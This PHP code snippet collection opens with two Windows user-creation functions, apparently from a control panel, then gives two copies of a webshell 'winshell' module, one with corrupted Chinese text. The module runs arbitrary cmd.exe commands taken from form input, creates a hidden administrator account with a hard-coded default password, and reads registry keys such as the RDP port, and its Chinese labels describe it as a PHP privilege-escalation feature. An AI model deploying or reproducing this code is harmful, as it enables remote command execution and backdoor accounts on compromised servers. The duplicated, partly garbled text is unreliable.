function os_create_system_user($basename, $password, $id, $shell, $dir = "/tmp") { $uobj = new COM("WinNT://."); try { $user = new COM("WinNT://./{$basename}"); } catch (exception $e) { $user = $uobj->create("user", $basename); } $user->setPassword($password); $user->setInfo(); }
function createUser() { global $gbl, $sgbl, $login, $ghtml; $mn = $this->main; $passwd = $mn->password; $parentname = $mn->getParentName(); //lxfile_mkdir("c:/webroot/home/root/hell"); print "creatinguser\n"; $obj = new COM("WinNT://."); try { $user = new COM("WinNT://./{$this->main->nname}"); dprint("description\n"); dprint($user->Description); dprint("\n"); if ($user->Description === uuser::getUserDescription($this->main->getParentName())) { return true; } else { throw new lxexception("user_exists", 'web_s_uuser_nname', $this->main->nname); } } catch (exception $e) { $user = $obj->create("user", $this->main->nname); $user->HomeDirectory = convertTobackSlash("c:/webroot/{$parentname}/{$parentname}"); //$user->Put("HomeDirDrive", "c:"); } try { $user->setInfo(); } catch (exception $e) { log_error("User Couldn't be created"); throw new lxexception("user_exists", 'web_s_uuser_nname', $this->main->nname); } //$obj->AccountDisabled = true; $grp = new COM("WinNT://./Users"); $grp->Add("WinNT://{$this->main->nname}"); $user->setPassword($this->main->realpass); $user->Description = uuser::getUserDescription($this->main->getParentName()); $user->setInfo(); }
function winshell() { $nop = ' '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<<END <div class="actall"> <form action="?s=jk&winshell=wscript" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br /> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<<END <div class="actall"> <form action="?s=jk&winshell=shelluser" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> Shell.Users�������ӹ���Ա<br><br> {$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br> {$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br> <input type="submit" value="����" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber'; print <<<END <div class="actall"> <form action="?s=jk&winshell=regedit" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> RegRead()������ȡע��������(Shell.Wscript����)<br><br> ע����·����<br> {$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br> <input type="submit" value="��ȡ����" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��"); try { $registry_proxystring = $shell->RegRead($regpath); } catch (Exception $e) { echo '����: ' . $e->getMessage(); } echo $registry_proxystring; } } else { $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>"; print <<<END <div class="actall"><pre> <br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Wscript������<br> WscriptΪ����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Shell.user����<br> USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br> RegRead()������ȡϵͳע��������<br>{$tip}</pre></div> END; } }
function winshell() { $nop = ' '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<<END <div class="actall"> <form action="?s=jk&winshell=wscript" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD路径<br /> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<<END <div class="actall"> <form action="?s=jk&winshell=shelluser" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> Shell.Users组件添加管理员<br><br> {$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br> {$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br> <input type="submit" value="添加" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber'; print <<<END <div class="actall"> <form action="?s=jk&winshell=regedit" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br> 注册表路径:<br> {$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br> <input type="submit" value="读取内容" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败"); try { $registry_proxystring = $shell->RegRead($regpath); } catch (Exception $e) { echo '内容: ' . $e->getMessage(); } echo $registry_proxystring; } } else { $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>"; print <<<END <div class="actall"><pre> <br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Wscript组件。<br> Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Shell.user组件<br> USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br> RegRead()函数读取系统注册表内容<br>{$tip}</pre></div> END; } }